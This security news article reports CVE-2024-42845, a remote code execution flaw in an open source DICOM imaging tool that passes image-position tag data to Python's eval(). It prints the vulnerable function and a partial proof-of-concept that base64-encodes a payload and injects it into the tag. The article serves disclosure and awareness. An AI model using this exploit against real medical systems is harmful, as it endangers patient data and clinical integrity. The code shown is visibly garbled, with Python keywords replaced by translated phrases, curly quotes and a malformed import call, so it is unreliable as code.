A serious remote code execution (RCE) vulnerability has been discovered in a popular open source biomedical tool.
The vulnerability, identified as CVE-2024-42845, raises concerns about the security of medical data and the integrity of the imaging process.
The vulnerability has been patched in the latest version, but the incident highlights the need for continued vigilance in the healthcare software space.
The vulnerability exists in the handling of DICOM (Digital Imaging and Communications in Medicine) files, a standard for transmitting, storing and sharing medical images.
DICOM is widely adopted in hospitals and clinics around the world, so any security breach could have far-reaching consequences.
CVE-2024-42845 – the Vulnerability
The vulnerability, CVE-2024-42845, is related to the software functionality that handles DICOM standard tags (0x0020, 0x0032).
This tag contains the coordinates of the top-left voxel of the image. The issue stems from the use of Python’s eval() function, which can execute arbitrary code if manipulated by a malicious actor.
def GetImagePosition(self):
try:
data = self.data_image[str(0x020)][str(0x032)].replace(“,”, “.”)
In addition to KeyError:
return “”
If the data:
Returns [eval(value) for value in data.split(“\”)]
return “”
Here, the eval() function is called on data extracted from the DICOM file, which, if injected into the image location index, would allow the execution of the malicious payload.
The problem is that character substitutions in the code prevent the transmission of standard payloads. However, attackers can circumvent this by encoding malicious commands using Base64 (provided in the Python standard library.
Image Patient
Code vulnerability example
To exploit this vulnerability, an attacker needs to modify or create a DICOM file that appends its payload as the fourth value to the tag at location (0x0020, 0x0032). After loading the modified file, the payload will be executed.
import pydicom
import base64
def encode_payload(plain_payload):
data = open(plain_payload, ‘rb’).read()
return f”exec(import(‘base64’).b64decode({base64.b64encode(data)})”
def prepare_dicom_payload(dicom_file_path, payload):
dicom_data = pydicom.dcmread(dicom_file_path)
value = dicom_data[0x0020, 0x0032].value
mal = [str(i) for i in value]
mal.append(encode_payload(payload))
# Further steps to save the modified DICOM file
Securing Medical Imaging Systems
This vulnerability highlights the importance of taking rigorous security measures in the development and deployment of medical imaging software.
Users of the affected software are advised to update to the latest versions immediately. Developers should prioritize secure coding practices and consider using additional input validation techniques to prevent similar vulnerabilities.
DICOM Vulnerabilities
According to a report by researcher Partywave, the discovery and responsible disclosure of this RCE vulnerability highlights the collaborative efforts required to protect open source medical tools.
While the vulnerability has since been resolved, it serves as a reminder of the ongoing challenges facing cybersecurity in healthcare.
Their efforts ensure that the cybersecurity landscape in healthcare continues to strengthen, protecting sensitive patient data and increasing the reliability of medical technology.
